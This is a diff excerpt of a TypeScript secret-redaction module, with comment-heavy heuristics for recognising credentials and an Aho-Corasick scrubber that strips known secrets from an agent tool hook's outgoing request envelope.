* symbol a word does not carry.
|
|
2182
|
-
*/
|
|
2183
|
-
function tokenLike(value: string): boolean {
|
|
2184
|
-
if (/\s/.test(value)) return false;
|
|
2185
|
-
if (/^[a-z]+(?:[-_.][a-z]+)*$/.test(value)) return false; // app-settings, created_at
|
|
2186
|
-
if (/^[A-Z]+(?:_[A-Z0-9]+)*$/.test(value) && !/\d/.test(value)) return false; // OTHER_VAR_NAME
|
|
2187
|
-
return /\d/.test(value) || /[a-z][A-Z]/.test(value) || /[^A-Za-z0-9_.-]/.test(value);
|
|
2188
|
-
}
|
|
2189
|
-
|
|
2190
|
-
/** A shell-quoted argument split into its quote character and its bare value. */
|
|
2191
|
-
function unquote(arg: string): [quote: string, value: string] {
|
|
2192
|
-
const m = /^(["'])([\s\S]*)\1$/.exec(arg);
|
|
2193
|
-
return m ? [m[1], m[2]] : ["", arg];
|
|
2194
|
-
}
|
|
2195
|
-
|
|
2196
|
-
/**
|
|
2197
|
-
* An unquoted value after `: ` or ` = ` in code is usually an expression, not a
|
|
2198
|
-
* literal: `token: string`, `password: hashedPassword`, `apiKey: config.apiKey`,
|
|
2199
|
-
* `secret: Uint8Array`. Those stay; `password: hunter2` does not. A long run of
|
|
2200
|
-
* letters that switches case like a random string does is kept as a secret too.
|
|
2201
|
-
*/
|
|
2202
|
-
function looksLikeExpression(value: string): boolean {
|
|
2203
|
-
if (TYPED_ARRAY_RE.test(value)) return true;
|
|
2204
|
-
if (/^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+[?!]?$/.test(value)) return true; // member access
|
|
2205
|
-
if (/^[A-Za-z_$][A-Za-z_$]*[?!]?$/.test(value)) {
|
|
2206
|
-
return !(value.length >= 16 && classSwitchRate(value) >= 0.3);
|
|
2207
|
-
}
|
|
2208
|
-
return false;
|
|
2209
|
-
}
|
|
2210
|
-
|
|
2211
|
-
/**
|
|
2212
|
-
* Whether an assignment's value is a secret, given how strongly its name says so.
|
|
2213
|
-
*
|
|
2214
|
-
* `spaced` is true for `: ` / ` = ` separators, where an unquoted value is more
|
|
2215
|
-
* often an expression than a literal; `urlQuery` for `?name=` / `&name=`, where
|
|
2216
|
-
* even a bare `key=` or `sig=` is a credential.
|
|
2217
|
-
*/
|
|
2218
|
-
function assignmentValueIsSecret(
|
|
2219
|
-
name: string,
|
|
2220
|
-
value: string,
|
|
2221
|
-
opts: { quoted: boolean; spaced: boolean; urlQuery: boolean; flag?: boolean; colon?: boolean },
|
|
2222
|
-
): boolean {
|
|
2223
|
-
let strength = secretNameStrength(name);
|
|
2224
|
-
if (!strength && opts.urlQuery && /^(?:key|sig|auth|code|access_token|client_secret)$/i.test(name)) strength = "weak";
|
|
2225
|
-
if (!strength) return false;
|
|
2226
|
-
if (!isLiteral(value)) return false;
|
|
2227
|
-
const bare = name.replace(/^[-"'\\]+|["'\\]+$/g, "");
|
|
2228
|
-
if (value.toLowerCase() === bare.toLowerCase()) return false; // f(api_key=api_key), "password": "Password"
|
|
2229
|
-
// A "quoted value" that starts with a delimiter is the tail of a string the
|
|
2230
|
-
// name sat inside: `print('has_key=', …)` quotes `, …` up to the next quote.
|
|
2231
|
-
if (opts.quoted && /^[,;)\]}\s]/.test(value)) return false;
|
|
2232
|
-
const envStyle = /^[A-Z][A-Z0-9_]*$/.test(bare);
|
|
2233
|
-
if (!opts.quoted) {
|
|
2234
|
-
// YAML has no expressions, so `POSTGRES_PASSWORD: changeme` under an
|
|
2235
|
-
// environment-style name is a literal. A type annotation on the same name
|
|
2236
|
-
// (`DB_PASSWORD: string`, `SECRET_KEY: str`), a camelCase variable
|
|
2237
|
-
// (`{ DB_PASSWORD: dbPassword }`) and member access (`API_TOKEN:
|
|
2238
|
-
// process.env.X`) are still code.
|
|
2239
|
-
const yamlLiteral =
|
|
2240
|
-
opts.colon === true && envStyle && /^[A-Za-z]+$/.test(value) && !/[a-z][A-Z]/.test(value) && !TYPE_WORDS.has(value.toLowerCase());
|
|
2241
|
-
if (opts.spaced && looksLikeExpression(value) && !yamlLiteral) return false;
|
|
2242
|
-
if (!opts.spaced) {
|
|
2243
|
-
if (/^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+$/.test(value) && !/\d/.test(value)) return false; // token=self.token
|
|
2244
|
-
// `authToken=userAuthTokenValue` in code is a variable, not a secret; an
|
|
2245
|
-
// environment-style name (`PASSWORD=letmein`) keeps any literal, and so
|
|
2246
|
-
// does a command-line flag (`mysql --password=letmein`): a shell has no
|
|
2247
|
-
// variables without a `$`.
|
|
2248
|
-
if (!envStyle && !name.startsWith("-") && /^[A-Za-z_$][A-Za-z_$]*$/.test(value) && classSwitchRate(value) < 0.45) return false;
|
|
2249
|
-
}
|
|
2250
|
-
}
|
|
2251
|
-
if (opts.flag) return value.length >= (strength === "strong" ? 6 : 8) && tokenLike(value);
|
|
2252
|
-
if (strength === "strong") return value.length >= 3;
|
|
2253
|
-
return value.length >= 8 && tokenLike(value);
|
|
2254
|
-
}
|
|
2255
|
-
|
|
2256
|
-
/**
|
|
2257
|
-
* Whether `value`, found under the key `name` in structured input (an MCP
|
|
2258
|
-
* tool's arguments, a JSON body), is a secret. The value is a literal string
|
|
2259
|
-
* by construction, so only its name and its shape decide.
|
|
2260
|
-
*/
|
|
2261
|
-
export function isSecretFieldValue(name: string, value: string): boolean {
|
|
2262
|
-
return assignmentValueIsSecret(name, value, { quoted: true, spaced: false, urlQuery: false });
|
|
2263
|
-
}
|
|
2264
|
-
|
|
2265
|
-
/**
|
|
2266
|
-
* The value of a credential header in STRUCTURED input — `{"headers":
|
|
2267
|
-
* {"Authorization": "Basic …"}}` from an HTTP-calling MCP tool, where the
|
|
2268
|
-
* name arrives as an object key rather than in the text.
|
|
2269
|
-
*
|
|
2270
|
-
* Same blunt rule as the text path, and the same reason: the NAME decides, the
|
|
2271
|
-
* value is never classified. Whatever sits under `Authorization`, `x-api-key`
|
|
2272
|
-
* or `Cookie` is replaced whole — a known scheme, an unknown one, a reference
|
|
2273
|
-
* (`Bearer $TOKEN`), a bare scheme word, prose. Three rounds were spent asking
|
|
2274
|
-
* whether the first word was a scheme, whether the value read like prose and
|
|
2275
|
-
* whether it was reference-shaped, and each of those questions sent a live
|
|
2276
|
-
* credential to Jev at least once: a 25-character `sk-` key passes for a
|
|
2277
|
-
* scheme, `Hawk`/`NTLM`/`Splunk` pass for prose, and this value never goes
|
|
2278
|
-
* through `redactSecrets`, so anything kept here is sent as it stands.
|
|
2279
|
-
*
|
|
2280
|
-
* Returns the marker and the credential copies it removed, or null when the
|
|
2281
|
-
* field is not a credential header or its value is blank. `secrets` is what
|
|
2282
|
-
* `scrubKnownSecrets` looks for in the rest of the envelope, so it holds the
|
|
2283
|
-
* BARE credential rather than the whole value: `{"Authorization": "Bearer
|
|
2284
|
-
* <tok>"}` reporting `Bearer <tok>` matched no copy of `<tok>` anywhere, and
|
|
2285
|
-
* the copy the human had pasted into their message went out to Jev. The same
|
|
2286
|
-
* `credentialCopies` as the text path, so a value that is already a marker
|
|
2287
|
-
* reports nothing and a value that is prose reports nothing either.
|
|
2288
|
-
*/
|
|
2289
|
-
export function redactAuthorizationField(name: string, value: string): { text: string; secrets: string[]; weak: string[] } | null {
|
|
2290
|
-
const field = name.trim();
|
|
2291
|
-
if (!CREDENTIAL_FIELD_RE.test(field)) return null;
|
|
2292
|
-
const v = value.trim();
|
|
2293
|
-
if (!v) return null;
|
|
2294
|
-
const copies = credentialCopies(v, headerHasScheme(field));
|
|
2295
|
-
return { text: marker(credentialHeaderLabel(field)), secrets: copies.secrets, weak: copies.weak };
|
|
2296
|
-
}
|
|
2297
|
-
|
|
2298
|
-
/**
|
|
2299
|
-
* A long token that looks generated: at least 32 characters, all three of
|
|
2300
|
-
* lower case, upper case and digits, and a character class that changes as
|
|
2301
|
-
* often as a random string's does. A random base64url token switches class at
|
|
2302
|
-
* ~64% of positions; camelCase identifiers, even long ones with a digit, switch
|
|
2303
|
-
* at a word boundary and sit well under half. Hex digests (git SHAs, sha256
|
|
2304
|
-
* sums, UUIDs) are single-case and never qualify, which is deliberate: they are
|
|
2305
|
-
* everywhere in real commands and almost never secret.
|
|
2306
|
-
*
|
|
2307
|
-
* Two more exclusions came from measuring real transcripts: a token that is
|
|
2308
|
-
* mostly digits and separators (`2026-08-31T10_22_33_123Z-debug-0`, an npm log
|
|
2309
|
-
* name) and a token built from words (`Offchain_Labs_whitepaper-2024-…`, a
|
|
2310
|
-
* docs asset with a hash suffix). A random token has letters in ~80% of its
|
|
2311
|
-
* positions and almost never a whole separator-delimited segment that is a word.
|
|
2312
|
-
*/
|
|
2313
|
-
export function looksRandomToken(t: string): boolean {
|
|
2314
|
-
if (t.length < 32) return false;
|
|
2315
|
-
if (/^(?:sha(?:1|224|256|384|512)|md5)[-_]/i.test(t)) return false;
|
|
2316
|
-
const upper = t.replace(/[^A-Z]/g, "").length;
|
|
2317
|
-
const lower = t.replace(/[^a-z]/g, "").length;
|
|
2318
|
-
if (upper < 3 || lower < 3 || !/[0-9]/.test(t)) return false;
|
|
2319
|
-
if ((upper + lower) / t.length < 0.5) return false;
|
|
2320
|
-
if (t.split(/[-_]/).some((seg) => /^[A-Z]?[a-z]{3,}$/.test(seg) || /^[A-Z]{4,}$/.test(seg))) return false;
|
|
2321
|
-
return classSwitchRate(t) >= 0.45;
|
|
2322
|
-
}
|
|
2323
|
-
|
|
2324
|
-
/**
|
|
2325
|
-
* True when the token at `offset` is part of a spelled-out digest —
|
|
2326
|
-
* `sha512-<base64>` (an npm integrity field, whose `+` and `/` split it into
|
|
2327
|
-
* several random-looking tokens) or `sha256=<base64>` (a wheel's RECORD). A
|
|
2328
|
-
* hash is not a secret, and these are everywhere in lockfiles.
|
|
2329
|
-
*/
|
|
2330
|
-
function insideDigest(whole: string, offset: number): boolean {
|
|
2331
|
-
let start = offset;
|
|
2332
|
-
const floor = Math.max(0, offset - 200);
|
|
2333
|
-
while (start > floor && /[A-Za-z0-9+/=_:-]/.test(whole[start - 1])) start--;
|
|
2334
|
-
return /^(?:sha(?:1|224|256|384|512)|md5)[-=:]/i.test(whole.slice(start, start + 8));
|
|
2335
|
-
}
|
|
2336
|
-
|
|
2337
|
-
// ── This machine's own secrets ───────────────────────────────────────────────
|
|
2338
|
-
|
|
2339
|
-
let envSecretSource: Record<string, string | undefined> | null = null;
|
|
2340
|
-
let envSecretCache: ReadonlyArray<readonly [string, string]> | null = null;
|
|
2341
|
-
|
|
2342
|
-
/**
|
|
2343
|
-
* The values of this process's secret-named environment variables, as exact
|
|
2344
|
-
* strings, longest first. An exact match is the one redaction with no false
|
|
2345
|
-
* positives, and it catches every secret shape no pattern knows — a Datadog
|
|
2346
|
-
* key is 32 hex characters, indistinguishable from a digest by shape alone.
|
|
2347
|
-
*/
|
|
2348
|
-
function envSecrets(): ReadonlyArray<readonly [string, string]> {
|
|
2349
|
-
if (envSecretCache) return envSecretCache;
|
|
2350
|
-
const env = envSecretSource ?? (process.env as Record<string, string | undefined>);
|
|
2351
|
-
const found: Array<readonly [string, string]> = [];
|
|
2352
|
-
for (const [name, value] of Object.entries(env)) {
|
|
2353
|
-
if (typeof value !== "string" || value.length < 12 || value.length > 4096) continue;
|
|
2354
|
-
if (!secretNameStrength(name) || !isLiteral(value) || !tokenLike(value)) continue;
|
|
2355
|
-
found.push([value, name]);
|
|
2356
|
-
}
|
|
2357
|
-
found.sort((a, b) => b[0].length - a[0].length);
|
|
2358
|
-
envSecretCache = found;
|
|
2359
|
-
return found;
|
|
2360
|
-
}
|
|
2361
|
-
|
|
2362
|
-
/**
|
|
2363
|
-
* Replace the environment the literal-secret rule reads (tests), or restore the
|
|
2364
|
-
* real one with `null`. Clears the cache either way.
|
|
2365
|
-
*/
|
|
2366
|
-
export function setEnvSecretSource(env: Record<string, string | undefined> | null): void {
|
|
2367
|
-
envSecretSource = env;
|
|
2368
|
-
envSecretCache = null;
|
|
2369
|
-
}
|
|
2370
|
-
|
|
2371
|
-
// ── The redactor ─────────────────────────────────────────────────────────────
|
|
2372
|
-
|
|
2373
|
-
type Groups = string[];
|
|
2374
|
-
|
|
2375
|
-
/**
|
|
2376
|
-
* A global replace whose callback may DECLINE a match (return null), counting
|
|
2377
|
-
* the replacements it makes.
|
|
2378
|
-
*
|
|
2379
|
-
* A declined match gives back all but its first character. `String.replace`
|
|
2380
|
-
* would resume scanning after it, and a declined match can contain the very
|
|
2381
|
-
* thing a rule is looking for: `raw = 'AWS_SECRET_ACCESS_KEY=wJalr…'` is first
|
|
2382
|
-
* seen as the assignment `raw = '…'`, declined because `raw` is no secret name,
|
|
2383
|
-
* and the secret-named assignment INSIDE its value was never looked at. A
|
|
2384
|
-
* rule whose declined match cannot hide a nested candidate — a token run, a
|
|
2385
|
-
* vendor prefix inside a longer word — passes `onDecline: "skip"` and resumes
|
|
2386
|
-
* after it instead.
|
|
2387
|
-
*/
|
|
2388
|
-
function replaceCounting(
|
|
2389
|
-
text: string,
|
|
2390
|
-
re: RegExp,
|
|
2391
|
-
fn: (match: string, groups: Groups, offset: number, whole: string) => string | null,
|
|
2392
|
-
counter: Counter,
|
|
2393
|
-
onDecline: "rescan" | "skip" = "rescan",
|
|
2394
|
-
): string {
|
|
2395
|
-
re.lastIndex = 0;
|
|
2396
|
-
let out = "";
|
|
2397
|
-
let last = 0;
|
|
2398
|
-
for (let m = re.exec(text); m !== null; m = re.exec(text)) {
|
|
2399
|
-
const groups = m.slice(1).map((g) => g ?? "");
|
|
2400
|
-
const replacement = m[0].length > 0 ? fn(m[0], groups, m.index, text) : null;
|
|
2401
|
-
if (replacement === null) {
|
|
2402
|
-
re.lastIndex = onDecline === "skip" && m[0].length > 0 ? m.index + m[0].length : m.index + 1;
|
|
2403
|
-
continue;
|
|
2404
|
-
}
|
|
2405
|
-
out += text.slice(last, m.index) + replacement;
|
|
2406
|
-
last = m.index + m[0].length;
|
|
2407
|
-
counter.n++;
|
|
2408
|
-
counter.found.push(replacedPart(m[0], replacement));
|
|
2409
|
-
}
|
|
2410
|
-
re.lastIndex = 0;
|
|
2411
|
-
return last === 0 ? text : out + text.slice(last);
|
|
2412
|
-
}
|
|
2413
|
-
|
|
2414
|
-
/**
|
|
2415
|
-
* The part of `match` a replacement removed: what lies between their common
|
|
2416
|
-
* prefix and suffix. It is what `scrubKnownSecrets` then looks for elsewhere
|
|
2417
|
-
* in the envelope, so a rule has to put back everything around the secret that
|
|
2418
|
-
* was not the secret — a QUOTE above all. A rule that dropped a quoted value
|
|
2419
|
-
* whole recorded `'hunter2'`, which appears nowhere else, and the bare copy in
|
|
2420
|
-
* the agent's own description went out with the request.
|
|
2421
|
-
*/
|
|
2422
|
-
function replacedPart(match: string, replacement: string): string {
|
|
2423
|
-
let p = 0;
|
|
2424
|
-
while (p < match.length && p < replacement.length && match[p] === replacement[p]) p++;
|
|
2425
|
-
let s = 0;
|
|
2426
|
-
while (s < match.length - p && s < replacement.length - p && match[match.length - 1 - s] === replacement[replacement.length - 1 - s]) s++;
|
|
2427
|
-
return match.slice(p, match.length - s);
|
|
2428
|
-
}
|
|
2429
|
-
|
|
2430
|
-
/**
|
|
2431
|
-
* Whether a secret is distinctive enough to scrub blindly wherever its bytes
|
|
2432
|
-
* appear: 16+ characters, or 8+ that look like a token.
|
|
2433
|
-
*/
|
|
2434
|
-
const scrubbable = (secret: string): boolean => secret.length >= 16 || (secret.length >= 8 && tokenLike(secret));
|
|
2435
|
-
|
|
2436
|
-
/**
|
|
2437
|
-
* Replace every copy of an already-found secret, in ONE pass over the text.
|
|
2438
|
-
*
|
|
2439
|
-
* A secret is only RECOGNISED where its context gives it away
|
|
2440
|
-
* (`aws_secret_access_key <value>`), but the same bytes can travel on without
|
|
2441
|
-
* that context — the path facts lift bare tokens out of the command, a human
|
|
2442
|
-
* pastes the value into a message.
|
|
2443
|
-
*
|
|
2444
|
-
* This ran as a loop over the secrets, each pass an `includes` + `split` over
|
|
2445
|
-
* the whole string, which made the envelope's final scrub the PRODUCT of two
|
|
2446
|
-
* things the agent writes: the number of distinct credentials in the request
|
|
2447
|
-
* and the number of bytes in the state. Both max out together — `cleanValue`
|
|
2448
|
-
* takes 24 keys at each of two levels, so a tool input of 24 objects of 24
|
|
2449
|
-
* strings is 576 strings of a thousand characters, and every one of them may
|
|
2450
|
-
* be a list of `--password <token>` arguments. Measured at 1.24 s for one
|
|
2451
|
-
* envelope inside the PreToolUse hook, on a curve where 6x the strings cost
|
|
2452
|
-
* 23x the time — and the `[...known].sort()` ran once per string on top.
|
|
2453
|
-
*
|
|
2454
|
-
* So the secrets are compiled into an Aho-Corasick automaton once
|
|
2455
|
-
* (`buildSecretScrubber`) and every string is scanned once against it. Both
|
|
2456
|
-
* halves are linear: building costs the total length of the secrets, which
|
|
2457
|
-
* are themselves substrings of the envelope, and scanning costs the text.
|
|
2458
|
-
*
|
|
2459
|
-
* `scrubKnownSecrets` compiles on each call, which is the right shape for a
|
|
2460
|
-
* single string. A caller with many strings — `scrubDeep` in ./envelope.ts —
|
|
2461
|
-
* builds the scrubber once and reuses it.
|
|
2462
|
-
*/
|
|
2463
|
-
export function scrubKnownSecrets(text: string, known: Iterable<string>): Redacted {
|
|
2464
|
-
return buildSecretScrubber(known).scrub(text);
|
|
2465
|
-
}
|
|
2466
|
-
|
|
2467
|
-
/** A set of secrets compiled once, then scanned against many strings. */
|
|
2468
|
-
export interface SecretScrubber {
|
|
2469
|
-
scrub(text: string): Redacted;
|
|
2470
|
-
}
|
|
2471
|
-
|
|
2472
|
-
/** The one scrubber that matches nothing, for an empty or all-filtered set. */
|
|
2473
|
-
const NO_SECRETS: SecretScrubber = { scrub: (text) => ({ text, count: 0 }) };
|
|
2474
|
-
|
|
2475
|
-
/**
|
|
2476
|
-
* Compile the secrets into a single-pass matcher.
|
|
2477
|
-
*
|
|
2478
|
-
* The automaton is the textbook one: a trie of the secrets, plus a failure
|
|
2479
|
-
* link per node to the longest proper suffix of that node's prefix which is
|
|
2480
|
-
* also a node. Following failure links while scanning is amortised O(1) per
|
|
2481
|
-
* character — each one lowers the node's depth, and a character raises it by
|
|
2482
|
-
* at most one — so the scan is linear in the text no matter what the secrets
|
|
2483
|
-
* look like, including 15 000 of them sharing one prefix, which is what a
|
|
2484
|
-
* prefix-bucket or first-k-character index would turn back into a product.
|
|
2485
|
-
*
|
|
2486
|
-
* Every node's edges are stored in ONE `Map` keyed by `parent * alphabet +
|
|
2487
|
-
* index`, rather than a `Map` per node: a maximal envelope compiles ~415 000
|
|
2488
|
-
* nodes, and 415 000 small `Map` objects cost more to allocate than the whole
|
|
2489
|
-
* scan. The index is the character's place in the alphabet the secrets
|
|
2490
|
-
* actually use (see below), which is what keeps those keys small integers.
|
|
2491
|
-
*/
|
|
2492
|
-
export function buildSecretScrubber(known: Iterable<string>): SecretScrubber {
|
|
2493
|
-
const secrets = [...new Set(known)].filter(scrubbable);
|
|
2494
|
-
if (secrets.length === 0) return NO_SECRETS;
|
|
2495
|
-
|
|
2496
|
-
// ── the alphabet ───────────────────────────────────────────────────────
|
|
2497
|
-
// The characters the secrets are actually made of, numbered from zero. Two
|
|
2498
|
-
// things come out of this, and both are worth a pass over the secrets.
|
|
2499
|
-
//
|
|
2500
|
-
// The edge keys below are `node * alphabet + index`, and the alphabet of a
|
|
2501
|
-
// set of credentials is some 64 characters rather than the 65 536 a raw
|
|
2502
|
-
// charCode spans. That keeps every key inside the 2^31 a small integer has,
|
|
2503
|
-
// where a `Map` hashes it directly; keyed on the raw code, a trie of any
|
|
2504
|
-
// size past 32 768 nodes pushed its keys into doubles, which is most of what
|
|
2505
|
-
// the build used to cost (86 ms of a maximal envelope's 127).
|
|
2506
|
-
//
|
|
2507
|
-
// And a character that appears in NO secret needs no lookup at all while
|
|
2508
|
-
// scanning: no match can span it, so the walk returns to the root. Ordinary
|
|
2509
|
-
// prose is mostly such characters.
|
|
2510
|
-
const ascii = new Int32Array(128).fill(-1);
|
|
2511
|
-
let wide: Map<number, number> | null = null;
|
|
2512
|
-
let alphabet = 0;
|
|
2513
|
-
const indexOfCode = (code: number): number => {
|
|
2514
|
-
if (code < 128) {
|
|
2515
|
-
const known = ascii[code];
|
|
2516
|
-
if (known >= 0) return known;
|
|
2517
|
-
return (ascii[code] = alphabet++);
|
|
2518
|
-
}
|
|
2519
|
-
wide ??= new Map<number, number>();
|
|
2520
|
-
const known = wide.get(code);
|
|
2521
|
-
if (known !== undefined) return known;
|
|
2522
|
-
const next = alphabet++;
|
|
2523
|
-
wide.set(code, next);
|
|
2524
|
-
return next;
|
|
2525
|
-
};
|
|
2526
|
-
for (const secret of secrets) for (let i = 0; i < secret.length; i++) indexOfCode(secret.charCodeAt(i));
|
|
2527
|
-
const A = alphabet;
|
|
2528
|
-
/** The scanning side, which must never ADD a character to the alphabet. */
|
|
2529
|
-
const lookup = (code: number): number => (code < 128 ? ascii[code] : (wide?.get(code) ?? -1));
|
|
2530
|
-
|
|
2531
|
-
// ── the trie ───────────────────────────────────────────────────────────
|
|
2532
|
-
const next = new Map<number, number>();
|
|
2533
|
-
// Every node but the root has exactly one incoming edge, so its parent and
|
|
2534
|
-
// the character on that edge are one entry each rather than a child list.
|
|
2535
|
-
const parent: number[] = [0];
|
|
2536
|
-
const edgeIdx: number[] = [0];
|
|
2537
|
-
/** The length of the longest secret ending at this node; 0 for none. */
|
|
2538
|
-
const ends: number[] = [0];
|
|
2539
|
-
let maxLen = 0;
|
|
2540
|
-
let minLen = Infinity;
|
|
2541
|
-
for (const secret of secrets) {
|
|
2542
|
-
maxLen = Math.max(maxLen, secret.length);
|
|
2543
|
-
minLen = Math.min(minLen, secret.length);
|
|
2544
|
-
let node = 0;
|
|
2545
|
-
for (let i = 0; i < secret.length; i++) {
|
|
2546
|
-
const idx = lookup(secret.charCodeAt(i));
|
|
2547
|
-
const key = node * A + idx;
|
|
2548
|
-
const existing = next.get(key);
|
|
2549
|
-
if (existing !== undefined) {
|
|
2550
|
-
node = existing;
|
|
2551
|
-
continue;
|
|
2552
|
-
}
|
|
2553
|
-
const child = parent.length;
|
|
2554
|
-
parent.push(node);
|
|
2555
|
-
edgeIdx.push(idx);
|
|
2556
|
-
ends.push(0);
|
|
2557
|
-
next.set(key, child);
|
|
2558
|
-
node = child;
|
|
2559
|
-
}
|
|
2560
|
-
ends[node] = secret.length;
|
|
2561
|
-
}
|
|
2562
|
-
|
|
2563
|
-
// ── failure links, breadth first ───────────────────────────────────────
|
|
2564
|
-
// Children are bucketed by parent with a counting sort (every node but the
|
|
2565
|
-
// root contributes exactly one edge), so the BFS needs no per-node array.
|
|
2566
|
-
const n = parent.length;
|
|
2567
|
-
const start = new Int32Array(n + 1);
|
|
2568
|
-
for (let v = 1; v < n; v++) start[parent[v] + 1]++;
|
|
2569
|
-
for (let v = 0; v < n; v++) start[v + 1] += start[v];
|
|
2570
|
-
const bucket = new Int32Array(n - 1);
|
|
2571
|
-
const cursor = Int32Array.from(start.subarray(0, n));
|
|
2572
|
-
for (let v = 1; v < n; v++) bucket[cursor[parent[v]]++] = v;
|
|
2573
|
-
|
|
2574
|
-
const fail = new Int32Array(n);
|
|
2575
|
-
const matchLen = new Int32Array(n);
|
|
2576
|
-
const queue = new Int32Array(n);
|
|
2577
|
-
let head = 0;
|
|
2578
|
-
let tail = 0;
|
|
2579
|
-
for (let k = start[0]; k < start[1]; k++) {
|
|
2580
|
-
const child = bucket[k];
|
|
2581
|
-
fail[child] = 0;
|
|
2582
|
-
matchLen[child] = ends[child];
|
|
2583
|
-
queue[tail++] = child;
|
|
2584
|
-
}
|
|
2585
|
-
while (head < tail) {
|
|
2586
|
-
const v = queue[head++];
|
|
2587
|
-
for (let k = start[v]; k < start[v + 1]; k++) {
|
|
2588
|
-
const child = bucket[k];
|
|
2589
|
-
const idx = edgeIdx[child];
|
|
2590
|
-
let f = fail[v];
|
|
2591
|
-
for (;;) {
|
|
2592
|
-
const step = next.get(f * A + idx);
|
|
2593
|
-
if (step !== undefined) {
|
|
2594
|
-
fail[child] = step;
|
|
2595
|
-
break;
|
|
2596
|
-
}
|
|
2597
|
-
if (f === 0) {
|
|
2598
|
-
fail[child] = 0;
|
|
2599
|
-
break;
|
|
2600
|
-
}
|
|
2601
|
-
f = fail[f];
|
|
2602
|
-
}
|
|
2603
|
-
// A secret ending here is the longest one ending at this position; any
|
|
2604
|
-
// other is a proper suffix of it, reachable down the failure chain.
|
|
2605
|
-
matchLen[child] = ends[child] !== 0 ? ends[child] : matchLen[fail[child]];
|
|
2606
|
-
queue[tail++] = child;
|
|
2607
|
-
}
|
|
2608
|
-
}
|
|
2609
|
-
|
|
2610
|
-
/**
|
|
2611
|
-
* Overlapping matches are MERGED into one replaced region rather than
|
|
2612
|
-
* resolved in favour of one of them.
|
|
2613
|
-
*
|
|
2614
|
-
* The loop this replaced took the longest secret first, so a secret that is
|
|
2615
|
-
* a prefix of another never split the longer one's copy and left its tail
|
|
2616
|
-
* behind. Merging keeps that promise without needing an order, and keeps it
|
|
2617
|
-
* in the symmetric case the old loop got wrong too: two known secrets that
|
|
2618
|
-
* overlap at different offsets used to leave a fragment of the loser
|
|
2619
|
-
* behind, whichever one was longer. Nothing inside a merged region survives,
|
|
2620
|
-
* and a region is only ever made of characters that were part of some
|
|
2621
|
-
* secret. The count stays the count of MARKERS, which is what it was: two
|
|
2622
|
-
* copies of one secret are still two, and a prefix inside its own longer
|
|
2623
|
-
* secret was one replacement then and is one region now.
|
|
2624
|
-
*/
|
|
2625
|
-
const scrub = (text: string): Redacted => {
|
|
2626
|
-
if (text.length < minLen) return { text, count: 0 };
|
|
2627
|
-
let node = 0;
|
|
2628
|
-
let out = "";
|
|
2629
|
-
let last = 0;
|
|
2630
|
-
let count = 0;
|
|
2631
|
-
let pendStart = -1;
|
|
2632
|
-
let pendEnd = -1;
|
|
2633
|
-
const flush = (): void => {
|
|
2634
|
-
out += text.slice(last, pendStart) + marker("repeated secret");
|
|
2635
|
-
last = pendEnd + 1;
|
|
2636
|
-
count++;
|
|
2637
|
-
pendStart = -1;
|
|
2638
|
-
pendEnd = -1;
|
|
2639
|
-
};
|
|
2640
|
-
for (let i = 0; i < text.length; i++) {
|
|
2641
|
-
// No match found from here on can reach back into the pending region:
|
|
2642
|
-
// one would have to start at or before `pendEnd`, and a secret is at
|
|
2643
|
-
// most `maxLen` characters long.
|
|
2644
|
-
if (pendStart >= 0 && i >= pendEnd + maxLen) flush();
|
|
2645
|
-
const idx = lookup(text.charCodeAt(i));
|
|
2646
|
-
// No secret holds this character, so no match can span it.
|
|
2647
|
-
if (idx < 0) {
|
|
2648
|
-
node = 0;
|
|
2649
|
-
continue;
|
|
2650
|
-
}
|
|
2651
|
-
for (;;) {
|
|
2652
|
-
const step = next.get(node * A + idx);
|
|
2653
|
-
if (step !== undefined) {
|
|
2654
|
-
node = step;
|
|
2655
|
-
break;
|
|
2656
|
-
}
|
|
2657
|
-
if (node === 0) break;
|
|
2658
|
-
node = fail[node];
|
|
2659
|
-
}
|
|
2660
|
-
const len = matchLen[node];
|
|
2661
|
-
if (len === 0) continue;
|
|
2662
|
-
// Clamp to the first uncommitted character: a long secret can end after
|
|
2663
|
-
// a region that was already replaced, and that region's bytes are gone.
|
|
2664
|
-
const s = Math.max(i - len + 1, last);
|
|
2665
|
-
if (s > i) continue;
|
|
2666
|
-
if (pendStart < 0) {
|
|
2667
|
-
pendStart = s;
|
|
2668
|
-
pendEnd = i;
|
|
2669
|
-
} else if (s <= pendEnd) {
|
|
2670
|
-
if (s < pendStart) pendStart = s;
|
|
2671
|
-
if (i > pendEnd) pendEnd = i;
|
|
2672
|
-
} else {
|
|
2673
|
-
flush();
|
|
2674
|
-
pendStart = s;
|
|
2675
|
-
pendEnd = i;
|
|
2676
|
-
}
|
|
2677
|
-
}
|
|
2678
|
-
if (pendStart >= 0) flush();
|
|
2679
|
-
return { text: last === 0 ? text : out + text.slice(last), count };
|
|
2680
|
-
};
|
|
2681
|
-
|
|
2682
|
-
return { scrub };
|
|
2683
|
-
}
|
|
2684
|
-
|
|
2685
|
-
export interface RedactOptions {
|
|
2686
|
-
/**
|
|
2687
|
-
* Whether the two BLUNT rules run: a credential header's whole value
|
|
2688
|
-
* (`redactCredentialHeaders`) and a credential flag's whole argument
|
|
2689
|
-
* (`redactCredentialArguments`).
|
|
2690
|
-
*
|
|
2691
|
-
* They exist for the ENVELOPE, the one place where over-redaction costs Jev
|
|
2692
|
-
* a little context it almost never needs and a miss hands a third party a
|
|
2693
|
-
* live key. Everywhere else that trade does not hold, because nothing leaves
|
|
2694
|
-
* the machine: the human's own prompt, stored for `readUserIntent`, came
|
|
2695
|
-
* back with everything after a `cookie:` or an `authorization:` cut out of
|
|
2696
|
-
* it, and the local verdict log's `inputPreview` — the operator's own record
|
|
2697
|
-
* of what the agent tried — lost the tail of any command that merely NAMED a
|
|
2698
|
-
* credential.
|
|
2699
|
-
*
|
|
2700
|
-
* So it is opt-IN, and the only caller that opts in is `redactInto` in
|
|
2701
|
-
* ./envelope.ts, where the request body is built. A default of ON is the
|
|
2702
|
-
* same mistake in a different place: every caller that forgets the option
|
|
2703
|
-
* silently gets the envelope's trade, and forgetting it is invisible until
|
|
2704
|
-
* someone reads a truncated log. Everyone else keeps the narrow rules (the
|
|
2705
|
-
* shared floor, vendor prefixes, PEM blocks, URL credentials, secret-named
|
|
2706
|
-
* assignments and flags, high-entropy tokens), which still remove a secret
|
|
2707
|
-
* that is actually there.
|
|
2708
|
-
*/
|
|
2709
|
-
blunt?: boolean;
|
|
2710
|
-
}
|
|
2711
|
-
|
|
2712
|
-
/**
|
|
2713
|
-
